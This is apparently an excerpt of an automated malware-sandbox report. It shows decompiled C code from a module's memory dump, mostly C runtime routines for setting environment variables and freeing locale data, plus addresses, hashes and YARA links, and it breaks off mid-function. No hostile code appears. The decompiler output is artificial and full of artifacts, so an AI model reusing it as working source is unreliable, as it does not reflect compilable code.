Download Yara Rule

C-Code - Quality: 83%

			E6E549F36(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E6E5311C0(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x6e68b6f0 - _t222; // 0x14f6868
							if(__eflags != 0) {
								L14:
								_t121 =  *0x6e68b6f0; // 0x14f6868
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E6E54A569(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E6E54A62C(_t237, _t282, 4);
													E6E541B83(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E6E541B83( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E6E54A62C(_t282, _t281, 4);
												E6E541B83(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x6e68b6f0 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E6E544550(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E6E541B83(_t298);
													goto L40;
												} else {
													_t133 = E6E53F3D0(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E6E53498C();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E6E612087(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E6E54A54F();
																	_t300 =  *0x6e68b6f4; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E6E54A5BE(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E6E54A62C(_t300, _t252, 4);
																						E6E541B83(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E6E541B83( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E6E54A62C(_t300, _t274, 4);
																					E6E541B83(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x6e68b6f4 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E6E544550(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E6E541B83(_t302);
																						goto L83;
																					} else {
																						_t152 = E6E546B92(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E6E53498C();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E6E544550(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E6E5349C0(_t226, _t262, _t283, _t290, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E6E541B83(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E6E544550(_t98, 1);
																											E6E541B83(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E6E53F3D0( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E6E53498C();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E6E544550(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E6E5349C0(_t226, _t265, _t284, _t291, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E6E541B83(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E6E544550(_t110, 2);
																																	E6E541B83(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E6E546B92( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E6E53498C();
																																			asm("int3");
																																			_t166 =  *0x6e68b6f0; // 0x14f6868
																																			__eflags = _t166 -  *0x6e68b6fc; // 0x14f6868
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x6e68b6f0 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E6E537E6F(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x6e68b6f0; // 0x14f6868
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x6e68b6f4 = E6E544550(1, 4);
																					E6E541B83(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x6e68b6f0 = E6E544550(1, 4);
																					E6E541B83(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x6e68b6f0 - _t226; // 0x14f6868
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x6e68b6f4; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L6E53EE60();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E6E54A54F();
																					L58:
																					_t300 =  *0x6e68b6f4; // 0x0
																					__eflags = _t300;
																					if(_t300 == 0) {
																						L82:
																						_t226 = _t225 | 0xffffffff;
																						__eflags = _t226;
																						L83:
																						E6E541B83(_t288);
																						_t138 = _t226;
																						goto L84;
																					} else {
																						goto L59;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t203 = E6E537E6F(__eflags);
															 *_t203 = 0x16;
															_t138 = _t203 | 0xffffffff;
															L84:
															return _t138;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t298 - _a4 - 1) = _t222;
														__eflags = E6E550481(_v20 + 1 + _t298 - _a4, _t282, __eflags, _t298,  ~_v5 & _v20 + 0x00000001 + _t298 - _a4);
														if(__eflags == 0) {
															_t210 = E6E537E6F(__eflags);
															_t223 = _t222 | 0xffffffff;
															__eflags = _t223;
															 *_t210 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t222;
									if(_v5 != _t222) {
										 *0x6e68b6f0 = E6E544550(1, 4);
										E6E541B83(_t222);
										_t317 = _t317 + 0xc;
										__eflags =  *0x6e68b6f0 - _t222; // 0x14f6868
										if(__eflags == 0) {
											L39:
											_t223 = _t222 | 0xffffffff;
											__eflags = _t223;
											goto L40;
										} else {
											__eflags =  *0x6e68b6f4 - _t222; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x6e68b6f4 = E6E544550(1, 4);
												E6E541B83(_t222);
												_t317 = _t317 + 0xc;
												__eflags =  *0x6e68b6f4 - _t222; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t223 = 0;
										L40:
										E6E541B83(_t286);
										_t119 = _t223;
										goto L41;
									}
								} else {
									__eflags =  *0x6e68b6f4 - _t222; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L6E53EE5B();
										if(__eflags == 0) {
											goto L38;
										} else {
											L120();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t221 = E6E537E6F(_t326);
					 *_t221 = 0x16;
					_t119 = _t221 | 0xffffffff;
					L41:
					return _t119;
				}
				L123:
			}

0x6e549f36
0x6e549f39
0x6e549f3b
0x6e549f3f
0x6e549f42
0x6e549f44
0x6e549f59
0x6e549f5e
0x6e549f60
0x6e549f65
0x6e549f6a
0x6e549f6c
0x6e54a14d
0x6e54a152
0x00000000
0x6e549f72
0x6e549f72
0x6e549f74
0x00000000
0x6e549f7a
0x6e549f7d
0x6e549f80
0x6e549f85
0x6e549f87
0x6e549f8d
0x6e54a00a
0x6e54a00a
0x6e54a00f
0x6e54a012
0x6e54a014
0x00000000
0x6e54a01a
0x6e54a021
0x6e54a026
0x6e54a02b
0x6e54a02e
0x6e54a030
0x6e54a081
0x6e54a081
0x6e54a084
0x00000000
0x6e54a08a
0x6e54a08a
0x6e54a08c
0x6e54a08f
0x6e54a08f
0x6e54a092
0x6e54a094
0x00000000
0x6e54a09a
0x6e54a09a
0x6e54a0a0
0x00000000
0x6e54a0a6
0x6e54a0b0
0x6e54a0b3
0x6e54a0b8
0x6e54a0bb
0x6e54a0be
0x6e54a0c0
0x00000000
0x6e54a0c6
0x6e54a0c6
0x6e54a0c9
0x6e54a0cb
0x6e54a0ce
0x00000000
0x6e54a0ce
0x6e54a0c0
0x6e54a0a0
0x6e54a094
0x6e54a032
0x6e54a032
0x6e54a034
0x00000000
0x6e54a036
0x6e54a039
0x6e54a03f
0x6e54a042
0x6e54a045
0x6e54a07a
0x6e54a07c
0x6e54a047
0x6e54a047
0x6e54a054
0x6e54a054
0x6e54a057
0x00000000
0x00000000
0x6e54a050
0x6e54a053
0x6e54a053
0x6e54a053
0x6e54a063
0x6e54a066
0x6e54a06b
0x6e54a06e
0x6e54a071
0x6e54a073
0x6e54a0d2
0x6e54a0d2
0x6e54a0d2
0x6e54a073
0x6e54a0d7
0x6e54a0da
0x00000000
0x6e54a0dc
0x6e54a0dc
0x6e54a0df
0x6e54a0df
0x6e54a0e1
0x6e54a0e2
0x6e54a0e2
0x6e54a0ee
0x6e54a0f6
0x6e54a0f9
0x6e54a0fa
0x6e54a0fc
0x6e54a144
0x6e54a145
0x00000000
0x6e54a0fe
0x6e54a105
0x6e54a10a
0x6e54a10d
0x6e54a10f
0x6e54a169
0x6e54a16a
0x6e54a16b
0x6e54a16c
0x6e54a16d
0x6e54a16e
0x6e54a173
0x6e54a176
0x6e54a177
0x6e54a179
0x6e54a17c
0x6e54a17d
0x6e54a180
0x6e54a182
0x6e54a197
0x6e54a198
0x6e54a199
0x6e54a19b
0x6e54a19c
0x6e54a19e
0x6e54a1a3
0x6e54a1a8
0x6e54a1aa
0x6e54a3a0
0x6e54a3a5
0x00000000
0x6e54a1b0
0x6e54a1b0
0x6e54a1b2
0x00000000
0x6e54a1b8
0x6e54a1bc
0x6e54a1be
0x6e54a1c1
0x6e54a1c4
0x6e54a1c9
0x6e54a1cf
0x6e54a1d1
0x6e54a1d3
0x6e54a25e
0x6e54a269
0x6e54a26c
0x6e54a271
0x6e54a276
0x6e54a278
0x6e54a2c6
0x6e54a2c6
0x6e54a2ca
0x00000000
0x6e54a2d0
0x6e54a2d0
0x6e54a2d2
0x6e54a2d5
0x6e54a2d5
0x6e54a2d8
0x6e54a2da
0x00000000
0x6e54a2e0
0x6e54a2e0
0x6e54a2e6
0x00000000
0x6e54a2ec
0x6e54a2f6
0x6e54a2f8
0x6e54a2fd
0x6e54a300
0x6e54a302
0x00000000
0x6e54a308
0x6e54a308
0x6e54a30b
0x6e54a30d
0x6e54a310
0x6e54a313
0x00000000
0x6e54a313
0x6e54a302
0x6e54a2e6
0x6e54a2da
0x6e54a27a
0x6e54a27a
0x6e54a27c
0x00000000
0x6e54a27e
0x6e54a281
0x6e54a287
0x6e54a28a
0x6e54a28e
0x6e54a2a5
0x6e54a2a5
0x6e54a2a8
0x00000000
0x00000000
0x6e54a2a1
0x6e54a2a4
0x6e54a2a4
0x6e54a2a4
0x6e54a2b4
0x6e54a2b6
0x6e54a2bb
0x6e54a2be
0x6e54a2c0
0x6e54a2c2
0x6e54a317
0x6e54a317
0x6e54a317
0x6e54a290
0x6e54a290
0x6e54a293
0x6e54a295
0x6e54a295
0x6e54a31d
0x6e54a320
0x00000000
0x6e54a326
0x6e54a326
0x6e54a328
0x6e54a328
0x6e54a32b
0x6e54a32b
0x6e54a32e
0x6e54a331
0x6e54a331
0x6e54a33c
0x6e54a340
0x6e54a348
0x6e54a34b
0x6e54a34c
0x6e54a34e
0x6e54a397
0x6e54a398
0x00000000
0x6e54a350
0x6e54a358
0x6e54a35d
0x6e54a360
0x6e54a362
0x6e54a3bc
0x6e54a3bd
0x6e54a3be
0x6e54a3bf
0x6e54a3c0
0x6e54a3c1
0x6e54a3c6
0x6e54a3c9
0x6e54a3ca
0x6e54a3cd
0x6e54a3ce
0x6e54a3d1
0x6e54a3d3
0x6e54a3da
0x6e54a3dc
0x6e54a3de
0x6e54a3e0
0x6e54a3e2
0x6e54a3e2
0x6e54a3e5
0x6e54a3e6
0x6e54a3e6
0x6e54a3e2
0x6e54a3ec
0x6e54a3f7
0x6e54a3fa
0x6e54a3fb
0x6e54a3fd
0x6e54a465
0x6e54a465
0x00000000
0x6e54a3ff
0x6e54a3ff
0x6e54a401
0x6e54a403
0x6e54a455
0x6e54a457
0x6e54a45d
0x00000000
0x6e54a405
0x6e54a405
0x6e54a408
0x6e54a408
0x6e54a40a
0x6e54a40a
0x6e54a40a
0x6e54a40d
0x6e54a40d
0x6e54a40f
0x6e54a410
0x6e54a410
0x6e54a414
0x6e54a418
0x6e54a41c
0x6e54a426
0x6e54a429
0x6e54a42e
0x6e54a431
0x6e54a435
0x00000000
0x6e54a437
0x6e54a43f
0x6e54a444
0x6e54a447
0x6e54a449
0x6e54a46a
0x6e54a46c
0x6e54a46d
0x6e54a46e
0x6e54a46f
0x6e54a470
0x6e54a471
0x6e54a476
0x6e54a479
0x6e54a47c
0x6e54a47d
0x6e54a47e
0x6e54a47f
0x6e54a482
0x6e54a484
0x6e54a48b
0x6e54a48d
0x6e54a48f
0x6e54a491
0x6e54a494
0x6e54a496
0x6e54a498
0x6e54a498
0x6e54a49b
0x6e54a49c
0x6e54a49c
0x6e54a498
0x6e54a4a1
0x6e54a4ac
0x6e54a4af
0x6e54a4b0
0x6e54a4b2
0x6e54a523
0x6e54a523
0x00000000
0x6e54a4b4
0x6e54a4b4
0x6e54a4b6
0x6e54a4b8
0x6e54a512
0x6e54a515
0x6e54a51b
0x00000000
0x6e54a4ba
0x6e54a4ba
0x6e54a4bd
0x6e54a4bd
0x6e54a4bf
0x6e54a4bf
0x6e54a4bf
0x6e54a4c2
0x6e54a4c2
0x6e54a4c5
0x6e54a4c8
0x6e54a4c8
0x6e54a4d4
0x6e54a4d8
0x6e54a4e0
0x6e54a4e6
0x6e54a4eb
0x6e54a4ee
0x6e54a4f2
0x00000000
0x6e54a4f4
0x6e54a4fc
0x6e54a501
0x6e54a504
0x6e54a506
0x6e54a528
0x6e54a52a
0x6e54a52b
0x6e54a52c
0x6e54a52d
0x6e54a52e
0x6e54a52f
0x6e54a534
0x6e54a535
0x6e54a53a
0x6e54a540
0x6e54a542
0x6e54a543
0x6e54a549
0x00000000
0x6e54a549
0x6e54a54e
0x00000000
0x00000000
0x00000000
0x6e54a506
0x00000000
0x6e54a508
0x6e54a508
0x6e54a50b
0x6e54a50d
0x6e54a50d
0x00000000
0x6e54a511
0x6e54a4b8
0x6e54a486
0x6e54a486
0x6e54a486
0x6e54a488
0x6e54a48a
0x6e54a48a
0x00000000
0x00000000
0x00000000
0x6e54a449
0x00000000
0x6e54a44b
0x6e54a44b
0x6e54a44e
0x6e54a450
0x6e54a450
0x00000000
0x6e54a454
0x6e54a403
0x6e54a3d5
0x6e54a3d5
0x6e54a3d5
0x6e54a3d7
0x6e54a3d9
0x6e54a3d9
0x6e54a364
0x6e54a368
0x6e54a36d
0x6e54a379
0x6e54a385
0x6e54a387
0x6e54a389
0x6e54a38e
0x6e54a38e
0x6e54a391
0x6e54a391
0x00000000
0x6e54a387
0x6e54a362
0x6e54a34e
0x6e54a320
0x6e54a27c
0x6e54a1d9
0x6e54a1d9
0x6e54a1de
0x6e54a1e1
0x6e54a1fb
0x6e54a1fb
0x6e54a1ff
0x6e54a208
0x6e54a20a
0x6e54a239
0x6e54a243
0x6e54a248
0x6e54a24d
0x00000000
0x6e54a20c
0x6e54a216
0x6e54a21b
0x6e54a220
0x6e54a223
0x6e54a229
0x00000000
0x6e54a22f
0x6e54a22f
0x6e54a235
0x6e54a237
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54a237
0x6e54a229
0x6e54a201
0x6e54a201
0x00000000
0x6e54a201
0x6e54a1e3
0x6e54a1e3
0x6e54a1e5
0x00000000
0x6e54a1e7
0x6e54a1ec
0x6e54a1ee
0x00000000
0x6e54a1f4
0x6e54a1f4
0x6e54a250
0x6e54a250
0x6e54a256
0x6e54a258
0x6e54a3ab
0x6e54a3ab
0x6e54a3ab
0x6e54a3ae
0x6e54a3af
0x6e54a3b6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54a258
0x6e54a1ee
0x6e54a1e5
0x6e54a1e1
0x6e54a1d3
0x6e54a1b2
0x6e54a184
0x6e54a184
0x6e54a189
0x6e54a18f
0x6e54a3b9
0x6e54a3bb
0x6e54a3bb
0x6e54a111
0x6e54a122
0x6e54a126
0x6e54a132
0x6e54a134
0x6e54a136
0x6e54a13b
0x6e54a13b
0x6e54a13e
0x6e54a13e
0x00000000
0x6e54a134
0x6e54a10f
0x6e54a0fc
0x6e54a0da
0x6e54a034
0x6e54a030
0x6e549f8f
0x6e549f8f
0x6e549f92
0x6e549fb0
0x6e549fb0
0x6e549fb3
0x6e549fc6
0x6e549fcb
0x6e549fd0
0x6e549fd3
0x6e549fd9
0x6e54a158
0x6e54a158
0x6e54a158
0x00000000
0x6e549fdf
0x6e549fdf
0x6e549fe5
0x00000000
0x6e549fe7
0x6e549ff1
0x6e549ff6
0x6e549ffb
0x6e549ffe
0x6e54a004
0x00000000
0x00000000
0x00000000
0x00000000
0x6e54a004
0x6e549fe5
0x6e549fb5
0x6e549fb5
0x6e54a15b
0x6e54a15c
0x6e54a163
0x00000000
0x6e54a165
0x6e549f94
0x6e549f94
0x6e549f9a
0x00000000
0x6e549f9c
0x6e549fa1
0x6e549fa3
0x00000000
0x6e549fa9
0x6e549fa9
0x00000000
0x6e549fa9
0x6e549fa3
0x6e549f9a
0x6e549f92
0x6e549f8d
0x6e549f74
0x6e549f46
0x6e549f46
0x6e549f4b
0x6e549f51
0x6e54a166
0x6e54a168
0x6e54a168
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 6E549F60
_free.LIBCMT ref: 6E54A039
_free.LIBCMT ref: 6E54A066

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: c91532a81f3202633980ddc6ab6457926230efd8ac06cb7c5fc40bbadcff7050
Instruction ID: a5b2752e15fa5081987dcedffc313ca3441d55514daeeaf686279bdda72181cc
Opcode Fuzzy Hash: c91532a81f3202633980ddc6ab6457926230efd8ac06cb7c5fc40bbadcff7050
Instruction Fuzzy Hash: B9D135B1904712EFDB919FF98880AAE77F8AF42714F10497EEA2497386FB71C9008750

Uniqueness

Uniqueness Score: -1.00%

Function 6E54B7D2, Relevance: 19.6, APIs: 13, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E54B7D2(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x89f84758
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x6e688c80) {
					_t3 = _t74 + 0x7c; // 0x3d077c1f
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x51673
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E541B83(_t46);
							_t5 = _t74 + 0x88; // 0x89f84758
							E6E54D3A3( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x7b8a7ff
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E541B83(_t47);
